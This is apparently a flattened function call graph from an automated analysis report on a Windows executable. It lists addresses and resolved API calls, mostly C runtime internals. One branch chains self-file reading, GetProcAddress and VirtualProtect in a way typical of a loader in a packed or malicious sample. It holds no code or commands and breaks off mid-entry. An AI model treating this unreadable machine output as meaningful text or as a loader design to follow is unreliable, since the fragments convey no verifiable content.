6d7960 17189->17190 17268 6d1d88 LeaveCriticalSection 17189->17268 17193 6cf1ef CallUnexpected 21 API calls 17190->17193 17194 6d7968 17193->17194 17264 6d7901 17196->17264 17197 6d55ba __Getctype 48 API calls 17200 6d78db 17197->17200 17199 6d55ba __Getctype 48 API calls 17199->17196 17200->17180 17201 6d55ba __Getctype 48 API calls 17200->17201 17201->17180 17203 6d1adc CallUnexpected std::bad_exception::bad_exception 17202->17203 17204 6d1b08 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17203->17204 17205 6d1bd9 CallUnexpected 17204->17205 17283 6c7231 17205->17283 17207 6d1bf7 17207->17054 17209 6d40e8 GetLastError 17208->17209 17210 6d40e5 17208->17210 17291 6df501 17209->17291 17210->17054 17213 6d411c 17214 6d4162 SetLastError 17213->17214 17214->17054 17215 6df53c ___vcrt_FlsSetValue 6 API calls 17216 6d4116 __Getctype 17215->17216 17216->17213 17217 6d413e 17216->17217 17218 6df53c ___vcrt_FlsSetValue 6 API calls 17216->17218 17219 6df53c ___vcrt_FlsSetValue 6 API calls 17217->17219 17220 6d4152 17217->17220 17218->17217 17219->17220 17296 6d2abe 17220->17296 17223 6d79df ___scrt_is_nonwritable_in_current_image 17222->17223 17228 6d1d71 EnterCriticalSection 17223->17228 17225 6d79ed 17229 6d7a2f 17225->17229 17228->17225 17232 6d1d88 LeaveCriticalSection 17229->17232 17231 6d7775 17231->17054 17232->17231 17269 6d1cae 17233->17269 17235 6d1a6b 17235->17180 17236->17182 17238 6d55d6 17237->17238 17239 6d55d0 17237->17239 17240 6d6023 __dosmaperr 6 API calls 17238->17240 17243 6d55da SetLastError 17238->17243 17241 6d5fe4 __dosmaperr 6 API calls 17239->17241 17242 6d55f2 17240->17242 17241->17238 17242->17243 17245 6d6664 __dosmaperr 14 API calls 17242->17245 17247 6d566f 17243->17247 17248 6d566a 17243->17248 17246 6d5607 17245->17246 17249 6d560f 17246->17249 17250 6d5620 17246->17250 17251 6d1fe3 CallUnexpected 46 API calls 17247->17251 17248->17199 17253 6d6023 __dosmaperr 6 API calls 17249->17253 17254 6d6023 __dosmaperr 6 API calls 17250->17254 17252 6d5674 17251->17252 17255 6d561d 17253->17255 17256 6d562c 17254->17256 17260 6d5327 ___free_lconv_mon 14 API calls 17255->17260 17257 6d5647 17256->17257 17258 6d5630 17256->17258 17261 6d58cc __dosmaperr 14 API calls 17257->17261 17259 6d6023 __dosmaperr 6 API calls 17258->17259 17259->17255 17260->17243 17262 6d5652 17261->17262 17263 6d5327 ___free_lconv_mon 14 API calls 17262->17263 17263->17243 17265 6d7905 17264->17265 17266 6d78cd 17264->17266 17282 6d1d88 LeaveCriticalSection 17265->17282 17266->17180 17266->17197 17266->17200 17268->17190 17270 6d1cc0 _Fputc 17269->17270 17273 6d1c08 17270->17273 17272 6d1cd8 _Fputc 17272->17235 17274 6d1c18 17273->17274 17275 6d1c1f 17273->17275 17276 6cd680 __strnicoll 16 API calls 17274->17276 17277 6d1c85 __strnicoll GetLastError SetLastError 17275->17277 17278 6d1c2d 17275->17278 17276->17275 17279 6d1c54 17277->17279 17278->17272 17279->17278 17280 6d1a8c __Getctype 11 API calls 17279->17280 17281 6d1c84 17280->17281 17282->17266 17284 6c7239 17283->17284 17285 6c723a IsProcessorFeaturePresent 17283->17285 17284->17207 17287 6c962d 17285->17287 17290 6c9713 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17287->17290 17289 6c9710 17289->17207 17290->17289 17292 6df60c ___vcrt_FlsGetValue 5 API calls 17291->17292 17293 6df51b 17292->17293 17294 6df533 TlsGetValue 17293->17294 17295 6d40fd 17293->17295 17294->17295 17295->17213 17295->17214 17295->17215 17297 6d5327 ___free_lconv_mon 14 API calls 17296->17297 17298 6d2ad6 17297->17298 17298->17213 17332 6cc84a 17299->17332 17302 6d713e GetOEMCP 17304 6d7167 17302->17304 17303 6d7150 17303->17304 17305 6d7155 GetACP 17303->17305 17304->17013 17306 6d5361 17304->17306 17305->17304 17307 6d539f 17306->17307 17311 6d536f __dosmaperr 17306->17311 17308 6d1374 __dosmaperr 14 API calls 17307->17308 17310 6d539d 17308->17310 17309 6d538a RtlAllocateHeap 17309->17310 17309->17311 17310->17009 17310->17010 17311->17307 17311->17309 17312 6cf50b std::ios_base::_Init 2 API calls 17311->17312 17312->17311 17314 6d711d 50 API calls 17313->17314 17315 6d6f38 17314->17315 17316 6d703d 17315->17316 17317 6d6f75 IsValidCodePage 17315->17317 17323 6d6f90 std::bad_exception::bad_exception 17315->17323 17318 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 17316->17318 17317->17316 17319 6d6f87 17317->17319 17320 6d711b 17318->17320 17321 6d6fb0 GetCPInfo 17319->17321 17319->17323 17320->17015 17320->17020 17321->17316 17321->17323 17372 6d74a7 17323->17372 17325 6d7658 ___scrt_is_nonwritable_in_current_image 17324->17325 17452 6d1d71 EnterCriticalSection 17325->17452 17327 6d7662 17453 6d73e6 17327->17453 17333 6cc868 17332->17333 17339 6cc861 17332->17339 17334 6d55ba __Getctype 48 API calls 17333->17334 17333->17339 17335 6cc889 17334->17335 17340 6d5b9e 17335->17340 17339->17302 17339->17303 17341 6cc89f 17340->17341 17342 6d5bb1 17340->17342 17344 6d5bcb 17341->17344 17342->17341 17348 6d9cc5 17342->17348 17345 6d5bde 17344->17345 17346 6d5bf3 17344->17346 17345->17346 17369 6d6eb2 17345->17369 17346->17339 17349 6d9cd1 ___scrt_is_nonwritable_in_current_image 17348->17349 17350 6d55ba __Getctype 48 API calls 17349->17350 17351 6d9cda 17350->17351 17358 6d9d20 17351->17358 17361 6d1d71 EnterCriticalSection 17351->17361 17353 6d9cf8 17362 6d9d46 17353->17362 17358->17341 17359 6d1fe3 CallUnexpected 48 API calls 17360 6d9d45 17359->17360 17361->17353 17363 6d9d54 __Getctype 17362->17363 17365 6d9d09 17362->17365 17364 6d9afa __Getctype 14 API calls 17363->17364 17363->17365 17364->17365 17366 6d9d25 17365->17366 17367 6d1d88 std::_Lockit::~_Lockit LeaveCriticalSection 17366->17367 17368 6d9d1c 17367->17368 17368->17358 17368->17359 17370 6d55ba __Getctype 48 API calls 17369->17370 17371 6d6eb7 17370->17371 17371->17346 17373 6d74cf GetCPInfo 17372->17373 17382 6d7598 17372->17382 17378 6d74e7 17373->17378 17373->17382 17375 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 17377 6d764a 17375->17377 17377->17316 17383 6d6950 17378->17383 17382->17375 17384 6cc84a __strnicoll 48 API calls 17383->17384 17385 6d6970 17384->17385 17403 6d53af 17385->17403 17387 6d6a2c 17390 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 17387->17390 17388 6d6a24 17406 6c9f67 17388->17406 17389 6d699d 17389->17387 17389->17388 17392 6d5361 __strnicoll 15 API calls 17389->17392 17394 6d69c2 __alloca_probe_16 std::bad_exception::bad_exception 17389->17394 17393 6d6a4f 17390->17393 17392->17394 17398 6d6a51 17393->17398 17394->17388 17395 6d53af __strnicoll MultiByteToWideChar 17394->17395 17396 6d6a0b 17395->17396 17396->17388 17397 6d6a12 GetStringTypeW 17396->17397 17397->17388 17410 6d53d9 17403->17410 17407 6c9f71 17406->17407 17408 6c9f82 17406->17408 17407->17408 17409 6d2abe ___std_exception_destroy 14 API calls 17407->17409 17408->17387 17409->17408 17411 6d53cb MultiByteToWideChar 17410->17411 17411->17389 17452->17327 17463 6d341b 17453->17463 17455 6d7408 17456 6d341b 29 API calls 17455->17456 17457 6d7427 17456->17457 17464 6d342c 17463->17464 17473 6d3428 _Yarn 17463->17473 17465 6d3433 17464->17465 17468 6d3446 std::bad_exception::bad_exception 17464->17468 17466 6d1374 __dosmaperr 14 API calls 17465->17466 17467 6d3438 17466->17467 17470 6d347d 17468->17470 17471 6d3474 17468->17471 17468->17473 17470->17473 17475 6d1374 __dosmaperr 14 API calls 17470->17475 17472 6d1374 __dosmaperr 14 API calls 17471->17472 17474 6d3479 17472->17474 17473->17455 17475->17474 17479 6d4fb8 17478->17479 17480 6d4faa 17478->17480 17481 6d1374 __dosmaperr 14 API calls 17479->17481 17480->17479 17485 6d4fd0 17480->17485 17482 6d4fc0 17481->17482 17484 6d1a5f __strnicoll 29 API calls 17482->17484 17483 6d4fca 17483->16957 17484->17483 17485->17483 17486 6d1374 __dosmaperr 14 API calls 17485->17486 17486->17482 17488 6d1853 17487->17488 17489 6d1870 17487->17489 17490 6d186a 17488->17490 17491 6d5327 ___free_lconv_mon 14 API calls 17488->17491 17489->16969 17492 6d5327 ___free_lconv_mon 14 API calls 17490->17492 17491->17488 17492->17489 17494 6d1a98 17493->17494 17495 6d1ac0 CallUnexpected 8 API calls 17494->17495 17496 6d1aad GetCurrentProcess TerminateProcess 17495->17496 17496->16973 17498 6dc6c0 17497->17498 17499 6dc6d1 17498->17499 17501 6dc6e4 ___from_strstr_to_strchr 17498->17501 17500 6d1374 __dosmaperr 14 API calls 17499->17500 17510 6dc6d6 17500->17510 17502 6dc8fb 17501->17502 17504 6dc704 17501->17504 17503 6d1374 __dosmaperr 14 API calls 17502->17503 17505 6dc900 17503->17505 17560 6dc920 17504->17560 17508 6d5327 ___free_lconv_mon 14 API calls 17505->17508 17508->17510 17509 6dc748 17512 6dc734 17509->17512 17564 6dc93a 17509->17564 17510->16923 17511 6dc74a 17511->17512 17515 6d6664 __dosmaperr 14 API calls 17511->17515 17518 6d5327 ___free_lconv_mon 14 API calls 17512->17518 17513 6dc726 17520 6dc72f 17513->17520 17521 6dc743 17513->17521 17517 6dc758 17515->17517 17519 6d5327 ___free_lconv_mon 14 API calls 17517->17519 17518->17510 17524 6dc763 17519->17524 17525 6d1374 __dosmaperr 14 API calls 17520->17525 17526 6dc920 48 API calls 17521->17526 17522 6dc7bd 17523 6d5327 ___free_lconv_mon 14 API calls 17522->17523 17532 6dc7c5 17523->17532 17524->17509 17524->17512 17530 6d6664 __dosmaperr 14 API calls 17524->17530 17525->17512 17526->17509 17527 6dc808 17527->17512 17528 6dbcd5 std::ios_base::_Init 32 API calls 17527->17528 17529 6dc836 17528->17529 17531 6d5327 ___free_lconv_mon 14 API calls 17529->17531 17533 6dc77f 17530->17533 17537 6dc7f2 17531->17537 17532->17537 17568 6dbcd5 17532->17568 17536 6d5327 ___free_lconv_mon 14 API calls 17533->17536 17534 6d5327 ___free_lconv_mon 14 API calls 17534->17510 17536->17509 17537->17512 17537->17537 17540 6d6664 __dosmaperr 14 API calls 17537->17540 17557 6dc8f0 17537->17557 17538 6dc7e9 17539 6d5327 ___free_lconv_mon 14 API calls 17538->17539 17539->17537 17541 6dc881 17540->17541 17542 6dc889 17541->17542 17543 6dc891 17541->17543 17545 6d5327 ___free_lconv_mon 14 API calls 17542->17545 17544 6d4f9c ___std_exception_copy 29 API calls 17543->17544 17546 6dc89d 17544->17546 17545->17512 17547 6dc915 17546->17547 17548 6dc8a4 17546->17548 17550 6d1a8c __Getctype 11 API calls 17547->17550 17577 6e383c 17548->17577 17552 6dc91f 17550->17552 17553 6dc8cb 17555 6d1374 __dosmaperr 14 API calls 17553->17555 17554 6dc8ea 17556 6d5327 ___free_lconv_mon 14 API calls 17554->17556 17556->17557 17557->17534 17561 6dc92d 17560->17561 17562 6dc70f 17560->17562 17592 6dc98f 17561->17592 17562->17509 17562->17511 17562->17513 17566 6dc950 17564->17566 17567 6dc7ad 17564->17567 17566->17567 17607 6e374b 17566->17607 17567->17522 17567->17527 17569 6dbcfd 17568->17569 17570 6dbce2 17568->17570 17572 6dbd0c 17569->17572 17707 6e26d4 17569->17707 17570->17569 17571 6dbcee 17570->17571 17573 6d1374 __dosmaperr 14 API calls 17571->17573 17714 6dec75 17572->17714 17576 6dbcf3 std::bad_exception::bad_exception 17573->17576 17576->17538 17726 6d6625 17577->17726 17582 6d6625 48 API calls 17585 6e388c 17582->17585 17583 6e38bb 17587 6dc8c5 17583->17587 17589 6d5327 ___free_lconv_mon 14 API calls 17583->17589 17584 6e38af 17584->17583 17586 6d5327 ___free_lconv_mon 14 API calls 17584->17586 17588 6cc944 17 API calls 17585->17588 17586->17583 17587->17553 17587->17554 17590 6e3899 17588->17590 17589->17587 17590->17584 17593 6dc9a2 17592->17593 17600 6dc99d 17592->17600 17594 6d6664 __dosmaperr 14 API calls 17593->17594 17604 6dc9bf 17594->17604 17595 6dca2d 17597 6d1fe3 CallUnexpected 48 API calls 17595->17597 17596 6dca1c 17598 6d5327 ___free_lconv_mon 14 API calls 17596->17598 17599 6dca32 17597->17599 17598->17600 17601 6d1a8c __Getctype 11 API calls 17599->17601 17600->17562 17602 6dca3e 17601->17602 17603 6d6664 __dosmaperr 14 API calls 17603->17604 17604->17595 17604->17596 17604->17599 17604->17603 17605 6d5327 ___free_lconv_mon 14 API calls 17604->17605 17606 6d4f9c ___std_exception_copy 29 API calls 17604->17606 17605->17604 17606->17604 17608 6e375f 17607->17608 17609 6e3759 17607->17609 17625 6e3774 17608->17625 17612 6e401b 17609->17612 17613 6e3fd3 17609->17613 17645 6e4031 17612->17645 17615 6e3fd9 17613->17615 17616 6e3ff6 17613->17616 17617 6d1374 __dosmaperr 14 API calls 17615->17617 17621 6d1374 __dosmaperr 14 API calls 17616->17621 17624 6e4014 17616->17624 17618 6e3fde 17617->17618 17620 6d1a5f __strnicoll 29 API calls 17618->17620 17619 6e3fe9 17619->17566 17620->17619 17622 6e4005 17621->17622 17623 6d1a5f __strnicoll 29 API calls 17622->17623 17623->17619 17624->17566 17626 6cc84a __strnicoll 48 API calls 17625->17626 17627 6e378a 17626->17627 17628 6e37a6 17627->17628 17629 6e37bd 17627->17629 17638 6e376f 17627->17638 17630 6d1374 __dosmaperr 14 API calls 17628->17630 17631 6e37d8 17629->17631 17632 6e37c6 17629->17632 17633 6e37ab 17630->17633 17635 6e37f8 17631->17635 17636 6e37e5 17631->17636 17634 6d1374 __dosmaperr 14 API calls 17632->17634 17637 6d1a5f __strnicoll 29 API calls 17633->17637 17639 6e37cb 17634->17639 17663 6e40fc 17635->17663 17640 6e4031 __strnicoll 48 API calls 17636->17640 17637->17638 17638->17566 17642 6d1a5f __strnicoll 29 API calls 17639->17642 17640->17638 17642->17638 17644 6d1374 __dosmaperr 14 API calls 17644->17638 17646 6e405b 17645->17646 17647 6e4041 17645->17647 17648 6e407a 17646->17648 17649 6e4063 17646->17649 17650 6d1374 __dosmaperr 14 API calls 17647->17650 17652 6e409d 17648->17652 17653 6e4086 17648->17653 17651 6d1374 __dosmaperr 14 API calls 17649->17651 17654 6e4046 17650->17654 17655 6e4068 17651->17655 17658 6cc84a __strnicoll 48 API calls 17652->17658 17661 6e4051 17652->17661 17656 6d1374 __dosmaperr 14 API calls 17653->17656 17657 6d1a5f __strnicoll 29 API calls 17654->17657 17659 6d1a5f __strnicoll 29 API calls 17655->17659 17660 6e408b 17656->17660 17657->17661 17658->17661 17659->17661 17662 6d1a5f __strnicoll 29 API calls 17660->17662 17661->17619 17662->17661 17664 6cc84a __strnicoll 48 API calls 17663->17664 17665 6e410f 17664->17665 17668 6e4142 17665->17668 17671 6e4176 __strnicoll 17668->17671 17669 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 17670 6e380e 17669->17670 17670->17638 17670->17644 17672 6e41f6 17671->17672 17673 6e43da 17671->17673 17675 6e41e3 GetCPInfo 17671->17675 17680 6e41fa 17671->17680 17674 6d53af __strnicoll MultiByteToWideChar 17672->17674 17672->17680 17677 6e427c 17674->17677 17675->17672 17675->17680 17676 6e43ce 17678 6c9f67 __freea 14 API calls 17676->17678 17677->17676 17679 6d5361 __strnicoll 15 API calls 17677->17679 17677->17680 17681 6e42a3 __alloca_probe_16 17677->17681 17678->17680 17679->17681 17680->17669 17680->17673 17681->17676 17682 6d53af __strnicoll MultiByteToWideChar 17681->17682 17683 6e42ef 17682->17683 17683->17676 17684 6d53af __strnicoll MultiByteToWideChar 17683->17684 17685 6e430b 17684->17685 17685->17676 17686 6e4319 17685->17686 17687 6e437c 17686->17687 17689 6d5361 __strnicoll 15 API calls 17686->17689 17692 6e4332 __alloca_probe_16 17686->17692 17688 6c9f67 __freea 14 API calls 17687->17688 17690 6e4382 17688->17690 17689->17692 17692->17687 17693 6d53af __strnicoll MultiByteToWideChar 17692->17693 17708 6e26df 17707->17708 17709 6e26f4 HeapSize 17707->17709 17710 6d1374 __dosmaperr 14 API calls 17708->17710 17709->17572 17711 6e26e4 17710->17711 17712 6d1a5f __strnicoll 29 API calls 17711->17712 17713 6e26ef 17712->17713 17713->17572 17715 6dec8d 17714->17715 17716 6dec82 17714->17716 17718 6dec95 17715->17718 17724 6dec9e __dosmaperr 17715->17724 17717 6d5361 __strnicoll 15 API calls 17716->17717 17722 6dec8a 17717->17722 17719 6d5327 ___free_lconv_mon 14 API calls 17718->17719 17719->17722 17720 6decc8 HeapReAlloc 17720->17722 17720->17724 17721 6deca3 17723 6d1374 __dosmaperr 14 API calls 17721->17723 17722->17576 17723->17722 17724->17720 17724->17721 17725 6cf50b std::ios_base::_Init 2 API calls 17724->17725 17725->17724 17727 6cc84a __strnicoll 48 API calls 17726->17727 17728 6d6637 17727->17728 17729 6d6649 17728->17729 17734 6d5e96 17728->17734 17731 6cc944 17729->17731 17740 6cc99c 17731->17740 17737 6d6402 17734->17737 17738 6d637d std::_Lockit::_Lockit 5 API calls 17737->17738 17739 6d5e9e 17738->17739 17739->17729 17741 6cc9aa 17740->17741 17742 6cc9c4 17740->17742 17758 6cc92a 17741->17758 17743 6cc9ea 17742->17743 17744 6cc9cb 17742->17744 17746 6d53af __strnicoll MultiByteToWideChar 17743->17746 17757 6cc95c 17744->17757 17762 6cc8eb 17744->17762 17748 6cc9f9 17746->17748 17749 6cca00 GetLastError 17748->17749 17750 6cca26 17748->17750 17752 6cc8eb 15 API calls 17748->17752 17767 6d139a 17749->17767 17753 6d53af __strnicoll MultiByteToWideChar 17750->17753 17750->17757 17752->17750 17755 6cca3d 17753->17755 17755->17749 17755->17757 17757->17582 17757->17584 17759 6cc935 17758->17759 17760 6cc93d 17758->17760 17761 6d5327 ___free_lconv_mon 14 API calls 17759->17761 17760->17757 17761->17760 17763 6cc92a 14 API calls 17762->17763 17764 6cc8f9 17763->17764 17772 6cc8cc 17764->17772 17775 6d1387 17767->17775 17773 6d5361 __strnicoll 15 API calls 17772->17773 17781 6c2010 GetModuleHandleA GetModuleFileNameA 17778->17781 17788 6c1af0 17781->17788 17786 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 17787 6c2091 17786->17787 17789 6c1b20 _Fputc 17788->17789 17803 6c2190 17789->17803 17792 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 17793 6c1b4e 17792->17793 17794 6c1f00 17793->17794 17971 6c1ba0 GetPEB 17794->17971 17796 6c1f1f 17972 6c1c10 GetProcAddress 17796->17972 17798 6c1f39 17799 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 17798->17799 17801 6c1ffb 17799->17801 17801->17786 17802 6c1f31 17802->17798 17986 6c1db0 17802->17986 17804 6c21b9 17803->17804 17807 6cd3e8 17804->17807 17806 6c1b3b 17806->17792 17808 6cd3fc _Fputc 17807->17808 17809 6cd41e 17808->17809 17811 6cd445 17808->17811 17810 6d1c08 __strnicoll 29 API calls 17809->17810 17813 6cd439 _Fputc 17810->17813 17814 6ceb9d 17811->17814 17813->17806 17815 6ceba9 ___scrt_is_nonwritable_in_current_image 17814->17815 17822 6cd19f EnterCriticalSection 17815->17822 17817 6cebb7 17823 6ce572 17817->17823 17822->17817 17837 6d7a3b 17823->17837 17825 6ce599 17844 6cd9c1 17825->17844 17832 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 17833 6ce60c 17832->17833 17834 6cebec 17833->17834 17970 6cd1b3 LeaveCriticalSection 17834->17970 17836 6cebd5 17836->17813 17867 6d7ae6 17837->17867 17839 6d7a4c _Fputc 17840 6d7aae 17839->17840 17841 6d5361 __strnicoll 15 API calls 17839->17841 17840->17825 17842 6d7aa5 17841->17842 17843 6d5327 ___free_lconv_mon 14 API calls 17842->17843 17843->17840 17874 6cd923 17844->17874 17847 6cd9e7 17848 6d1c08 __strnicoll 29 API calls 17847->17848 17849 6cda04 17848->17849 17860 6cd6f1 17849->17860 17854 6cd882 75 API calls 17855 6cda0f std::_Locinfo::_Locinfo_dtor 17854->17855 17855->17849 17855->17854 17856 6cdc03 17855->17856 17880 6cd620 17855->17880 17886 6cdc71 17855->17886 17889 6cdce9 17855->17889 17929 6cde42 17855->17929 17857 6d1c08 __strnicoll 29 API calls 17856->17857 17858 6cdc1d 17857->17858 17859 6d1c08 __strnicoll 29 API calls 17858->17859 17859->17849 17861 6d5327 ___free_lconv_mon 14 API calls 17860->17861 17862 6cd701 17861->17862 17863 6d7b24 17862->17863 17864 6d7b2f 17863->17864 17865 6ce5fa 17863->17865 17864->17865 17964 6d2248 17864->17964 17865->17832 17868 6d7af2 _Fputc 17867->17868 17869 6d7b1c 17868->17869 17870 6d8ab4 _Ungetc 29 API calls 17868->17870 17869->17839 17871 6d7b0d 17870->17871 17872 6e00cf _Fputc 29 API calls 17871->17872 17873 6d7b13 17872->17873 17873->17839 17875 6cd92e 17874->17875 17876 6cd950 17874->17876 17877 6d1c08 __strnicoll 29 API calls 17875->17877 17878 6cd48c 29 API calls 17876->17878 17879 6cd949 17877->17879 17878->17879 17879->17847 17879->17849 17879->17855 17881 6cd630 17880->17881 17882 6d5bf8 _Fputc 48 API calls 17881->17882 17883 6cd64d 17882->17883 17884 6d5c29 _Fputc 48 API calls 17883->17884 17885 6cd65a 17884->17885 17885->17855 17887 6cec6a 29 API calls 17886->17887 17888 6cdcac 17887->17888 17888->17855 17890 6cdd07 17889->17890 17891 6cdcf0 17889->17891 17892 6cdd46 17890->17892 17895 6d1c08 __strnicoll 29 API calls 17890->17895 17891->17892 17893 6cde66 17891->17893 17894 6cded2 17891->17894 17892->17855 17896 6cde6c 17893->17896 17897 6cdefa 17893->17897 17898 6cded7 17894->17898 17899 6cdf11 17894->17899 17900 6cdd3b 17895->17900 17906 6cdec7 17896->17906 17907 6cde71 17896->17907 17904 6cea10 30 API calls 17897->17904 17901 6cdf08 17898->17901 17909 6cded9 17898->17909 17902 6cdf16 17899->17902 17903 6cdf30 17899->17903 17900->17855 17905 6ce47f 30 API calls 17901->17905 17902->17897 17902->17906 17920 6cde99 17902->17920 17908 6ce49c 30 API calls 17903->17908 17904->17920 17905->17920 17913 6ce6f6 30 API calls 17906->17913 17924 6cdf3b 17906->17924 17910 6cde80 17907->17910 17912 6cdeac 17907->17912 17907->17920 17908->17920 17909->17910 17914 6cdee8 17909->17914 17911 6ce2ee 51 API calls 17910->17911 17910->17924 17911->17920 17916 6ce184 50 API calls 17912->17916 17912->17924 17913->17920 17914->17897 17915 6cdeec 17914->17915 17919 6ce4b2 29 API calls 17915->17919 17915->17924 17916->17920 17917 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 17918 6ce182 17917->17918 17918->17855 17919->17920 17921 6cd95b 75 API calls 17920->17921 17920->17924 17925 6ce03c 17920->17925 17921->17920 17922 6cd95b 75 API calls 17922->17925 17923 6d87e0 _Fputc 50 API calls 17926 6ce0af 17923->17926 17924->17917 17925->17922 17925->17926 17926->17923 17928 6ce114 17926->17928 17927 6cd95b 75 API calls 17927->17928 17928->17924 17928->17927 17930 6cde66 17929->17930 17931 6cded2 17929->17931 17932 6cde6c 17930->17932 17933 6cdefa 17930->17933 17934 6cded7 17931->17934 17935 6cdf11 17931->17935 17945 6cde71 17932->17945 17946 6cdec7 17932->17946 17941 6cea10 30 API calls 17933->17941 17936 6cdf08 17934->17936 17937 6cded9 17934->17937 17938 6cdf16 17935->17938 17939 6cdf30 17935->17939 17942 6ce47f 30 API calls 17936->17942 17943 6cde80 17937->17943 17949 6cdee8 17937->17949 17938->17933 17938->17946 17955 6cde99 17938->17955 17940 6ce49c 30 API calls 17939->17940 17940->17955 17941->17955 17942->17955 17944 6ce2ee 51 API calls 17943->17944 17958 6cdf3b 17943->17958 17944->17955 17945->17943 17947 6cdeac 17945->17947 17945->17955 17948 6ce6f6 30 API calls 17946->17948 17946->17958 17951 6ce184 50 API calls 17947->17951 17947->17958 17948->17955 17949->17933 17950 6cdeec 17949->17950 17954 6ce4b2 29 API calls 17950->17954 17950->17958 17951->17955 17952 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 17953 6ce182 17952->17953 17953->17855 17954->17955 17956 6cd95b 75 API calls 17955->17956 17955->17958 17960 6ce03c 17955->17960 17956->17955 17957 6cd95b 75 API calls 17957->17960 17958->17952 17959 6d87e0 _Fputc 50 API calls 17961 6ce0af 17959->17961 17960->17957 17960->17961 17961->17959 17963 6ce114 17961->17963 17962 6cd95b 75 API calls 17962->17963 17963->17958 17963->17962 17965 6d2261 17964->17965 17969 6d2288 17964->17969 17966 6d8ab4 _Ungetc 29 API calls 17965->17966 17965->17969 17967 6d227d 17966->17967 17968 6dd230 _Fputc 73 API calls 17967->17968 17968->17969 17969->17865 17970->17836 17971->17796 17973 6c1c59 CreateFileA 17972->17973 17974 6c1caa 17973->17974 17975 6c1cb3 GetFileSize 17973->17975 17978 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 17974->17978 17976 6c1cd9 CloseHandle 17975->17976 17977 6c1cf1 17975->17977 17976->17974 17998 6c7223 17977->17998 17980 6c1d98 17978->17980 17980->17802 17982 6c1d3c 17984 6c1d4d 17982->17984 17985 6c1d58 CloseHandle 17982->17985 17983 6c1d70 CloseHandle 17983->17974 17984->17985 17985->17974 18012 6c1000 17986->18012 17989 6c1000 115 API calls 17990 6c1e5b GetProcAddress 17989->17990 17991 6c1e84 VirtualProtect 17990->17991 17999 6c71b3 ___std_exception_copy 17998->17999 18000 6c1cfc ReadFile 17999->18000 18001 6cf50b std::ios_base::_Init 2 API calls 17999->18001 18002 6c71d4 17999->18002 18000->17982 18000->17983 18001->17999 18003 6c951e std::ios_base::_Init 18002->18003 18004 6c71de Concurrency::cancel_current_task 18002->18004 18005 6ca4bc CallUnexpected RaiseException 18003->18005 18009 6ca4bc 18004->18009 18006 6c953a 18005->18006 18008 6c79d3 18010 6ca504 RaiseException 18009->18010 18011 6ca4d6 18009->18011 18010->18008 18011->18010 18013 6c1056 18012->18013 18027 6c1440 18013->18027 18015 6c13c7 18050 6c1b80 18015->18050 18020 6c1167 ___std_exception_copy 18020->18015 18021 6c1af0 81 API calls 18020->18021 18022 6d2abe ___std_exception_destroy 14 API calls 18020->18022 18031 6c1490 18020->18031 18034 6c14c0 18020->18034 18021->18020 18022->18020 18028 6c1466 std::ios_base::_Init 18027->18028 18029 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 18028->18029 18030 6c1487 18029->18030 18030->18020 18053 6c2470 18031->18053 18033 6c14aa 18033->18020 18036 6c1510 _strlen 18034->18036 18100 6c30f0 18036->18100 18037 6c15b1 18045 6c15c4 18037->18045 18104 6c3220 18037->18104 18293 6c2290 18050->18293 18054 6c24b8 18053->18054 18056 6c249f 18053->18056 18057 6c2550 18054->18057 18056->18033 18058 6c2593 std::ios_base::_Init 18057->18058 18076 6c2800 18058->18076 18077 6c281b std::ios_base::_Init 18076->18077 18101 6c3139 18100->18101 18103 6c3151 18101->18103 18134 6c3780 18101->18134 18103->18037 18135 6c37c2 18134->18135 18136 6c30f0 39 API calls 18135->18136 18139 6c3875 18135->18139 18139->18103 18294 6c22a4 std::ios_base::_Init 18293->18294 18296 6c13d2 18294->18296 18297 6c2380 18294->18297 18296->17989 18300 6c23b0 18297->18300 18301 6c23c9 18300->18301 18302 6c23db std::ios_base::_Ios_base_dtor 18300->18302 18306 6cd11d 18304->18306 18307 6cd12f ___scrt_uninitialize_crt 18304->18307 18305 6cd12b 18305->16805 18306->18305 18309 6d21da 18306->18309 18307->16805 18312 6d2305 18309->18312 18315 6d23de 18312->18315 18316 6d23ea ___scrt_is_nonwritable_in_current_image 18315->18316 18323 6d1d71 EnterCriticalSection 18316->18323 18318 6d2460 18332 6d247e 18318->18332 18322 6d23f4 ___scrt_uninitialize_crt 18322->18318 18324 6d2352 18322->18324 18323->18322 18325 6d235e ___scrt_is_nonwritable_in_current_image 18324->18325 18335 6cd19f EnterCriticalSection 18325->18335 18327 6d2368 ___scrt_uninitialize_crt 18328 6d23a1 18327->18328 18336 6d21e3 18327->18336 18347 6d23d2 18328->18347 18399 6d1d88 LeaveCriticalSection 18332->18399 18334 6d21e1 18334->18305 18335->18327 18337 6d21f8 _Fputc 18336->18337 18338 6d21ff 18337->18338 18339 6d220a 18337->18339 18340 6d2305 ___scrt_uninitialize_crt 77 API calls 18338->18340 18341 6d2248 ___scrt_uninitialize_crt 73 API calls 18339->18341 18344 6d2205 _Fputc 18340->18344 18342 6d2214 18341->18342 18342->18344 18350 6d8ab4 18342->18350 18344->18328 18345 6d222b 18357 6dcef5 18345->18357 18398 6cd1b3 LeaveCriticalSection 18347->18398 18349 6d23c0 18349->18322 18351 6d8ad5 18350->18351 18352 6d8ac0 18350->18352 18351->18345 18353 6d1374 __dosmaperr 14 API calls 18352->18353 18354 6d8ac5 18353->18354 18355 6d1a5f __strnicoll 29 API calls 18354->18355 18356 6d8ad0 18355->18356 18356->18345 18358 6dcf06 18357->18358 18359 6dcf13 18357->18359 18360 6d1374 __dosmaperr 14 API calls 18358->18360 18361 6dcf5c 18359->18361 18363 6dcf3a 18359->18363 18367 6dcf0b 18360->18367 18362 6d1374 __dosmaperr 14 API calls 18361->18362 18364 6dcf61 18362->18364 18368 6dcf72 18363->18368 18366 6d1a5f __strnicoll 29 API calls 18364->18366 18366->18367 18367->18344 18369 